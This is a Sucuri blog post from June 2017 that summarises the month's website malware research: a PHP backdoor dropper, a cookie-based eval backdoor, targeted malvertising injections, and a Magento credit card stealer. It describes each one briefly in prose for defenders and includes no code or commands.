• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Labs Notes Monthly Recap – May/2017

June 6, 2017Estevao AvillezEspanolPortugues

14
SHARES
FacebookTwitterSubscribe

Sucuri Labs provides website malware research updates directly from our teams on the front line. You can read past-monthly recaps to catch up on trends we look at every month.

This month, our Malware Research and Incident Response teams wrote about malware infections ranging from backdoors, credit card stealers, and malvertising.

The Elegant Dropper – Reusable Code for PHP Shell Installation

Yuliyan Tsvetskov

In website security, a “dropper” is a piece of code that downloads malicious content from an external source. The actual code injection on the victim’s site appears legitimate and is often undetected by security scanners.

This piece of code uses additional evasion techniques by setting up variables to store the path where the backdoor will be injected, then downloading the contents from an external malicious URL containing the backdoor code. By putting these two together, the malicious file contents are injected into the WordPress admin area. Even if the backdoor is removed, the dropper can be executed again to reinject the backdoor.

Read More

Simple $_COOKIE Backdoor Variation

Fernando Barbosa

Malware often uses $_POST and $_GET requests to inject (or steal) content for malicious purposes which are usually later flagged as malicious.

In this case, we look at an attacker who sets cookie content to contain malicious content in the form of “eval” statements and executable code. We found several variants throughout the infected file system. These cookies are then used as variables in malware injections and executed remotely.

Read More

Tricky Malvertising Injections

Abdelli Nasereddine

Conditional malware attempts target only specific visitors (geo-locations, devices, or referrers like Google Search), which make the malware harder to detect. This type of targeting is often seen with SEO spam and malvertising.

This malicious code serves specific ads to visitors in different time zones. Lately, these types of injections are noticeably rising in popularity.

Read More

Client-Side or Server-Side Script?

Denis Sinegubko

JavaScript malware injections are always suspicious. What appears to be a benign resource can actually be malicious. We found this particular infection on a Magento website but with a twist on the classic credit card stealer.

A server-side script receives data from filled in checkout forms by collecting POST request info. If you don’t use the POST method and don’t pass correct parameters, it pretends to be a benign JavaScript.

Read More

14
SHARES
FacebookTwitterSubscribe

Categories: Security Education, Sucuri UpdatesTags: Industry Reports, Labs Notes Recap, Malware Updates

About Estevao Avillez

Estevao Avillez is currently Director of Product management at GoDaddy and the Director of Security Operations. He oversees Sucuri's Malware Research Lab and leads the Incident Response Team in providing the highest standard of customer service. You can follow him on Twitter at @estevaoavillez.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Sucuri website security

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2019 Sucuri Inc. All rights reserved

We use tools, such as cookies, to enable essential services and functionality on our site and to collect data on how visitors interact with our site, products and services. By clicking Continue, you agree to our use of these tools for advertising, analytics and support.Continue Read More